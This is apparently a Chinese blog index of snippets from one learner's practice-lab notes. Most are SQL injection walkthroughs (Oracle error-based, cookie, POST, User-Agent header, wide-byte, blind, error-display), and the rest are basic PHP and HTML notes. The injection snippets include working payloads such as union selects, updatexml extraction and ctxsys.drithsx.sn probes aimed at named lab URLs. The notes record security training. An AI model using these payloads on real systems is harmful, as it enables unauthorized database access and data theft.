靶场笔记大全
不知道为啥,我上传笔记老是卡住,可能是因为排版问题,下面将所有未发布的笔记打包上传!
Oracle注入 — 报错注入
http://o1.lab.aqlab.cn:81/?id=1%27%20and%201%20=ctxsys.drithsx.sn(1,(select%20banner%20from%20sys.v_$version%20where%20rownum=1))--得知是Oracle数据库,先查询数据库表,表名为admin,将admin表排除,继续查询数据,猜完表名,再猜列名http://o1.lab
Access注入 — Cookie注入
提示得知,这是cookie注入的题,cookie注入的方式五花八门,这里我使用的是谷歌浏览器+ ModHeader插件使用cookie进行传参,返回正常,说明cookie可以传参,(cookie传参要URL编码)下面进行注入:猜字段数,字段数为10,猜解表名,默认为adminid=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin暴出输出位,使用联合查
3.6、POST注入
6.6.1-SQL注入-Post注入Rank 1①分析登录语句 得知传参被单引号包括,尝试绕过,否则sql语句无法执行。 闭合单引号,后面添加注释符注释掉程序给的单引号。添加判断条件,or 1=1Or = “或者”OK,sql语句正常执行,继续注入。②猜字段数 登录成功,字段数为2。③猜解数据库名 无法输出后面的sql语句结果,得让它报错显示。 得
3.5、HEAD注入
第一题: 得知注入点在User-Agent;①暴出数据库名:' or updatexml(1,concat(0x7e,database(),0x7e),1),1,1)# 得到数据库名:security②暴表名&列名 ' or updatexml(1,concat(0x7e,(select table_name from information_
3.3、宽字节
①猜解字段数 发现sql语句无法正常执行,出现转意字符,尝试闭合反斜杠转意字符,得知\的URL编码是%5c,在\前面加个%df,%df%5c组合起来就是一个運字,这样sql语句就可以正常执行。 ②查询当前数据库: ③查询表名&列名: ④查询列的数据: 第二题和一题一样的 第三题:抓包查看数据,发
后端基础PHP—Php简介及基本函数-上+下+表单验证
==========自己总结的关于PHP的一些知识点==========1,PHP文件是以.PHP结尾;2,一局PHP代码写完,必须使用分号结束;3,echo是输出;(列:echo 'hello world';);4,声明变量要在变量前加$;5,变量不能以数字或特殊字符开头;6,变量严格区分大小写;7,单引号不能解析变量,双引号可以解析变量;8,字符串和变量一起的时候,用.(点)来
1.3&1.4、前端基础Div+css - 简介与进阶
<!DOCTYPE HTML><html><head><title>QQ空间</title><link rel="stylesheet" href="yzr.css" type="text/css"></head><body background=&
3.2、盲注
第一题:①猜解数据库长度:http://120.203.13.75:8150/New/BlindBased/RankOne/sql-one/?id=1%27%20and%20(length(database()))=8%20--+②猜解当前数据库名:http://120.203.13.75:8150/New/BlindBased/RankOne/sql-one/?id=1%27%20and%20(
3.1、显错注入
①猜解字段数,传参全部被单引号包括,sql语句无法执行,尝试闭合:http://120.203.13.75:8150/New/ErrorBased/RankOne/sql-one/?id=1'%20order%20by%203%20--+得出字段数为四;②联合查询:http://120.203.13.75:8150/New/ErrorBased/RankOne/sql-one/?id=1&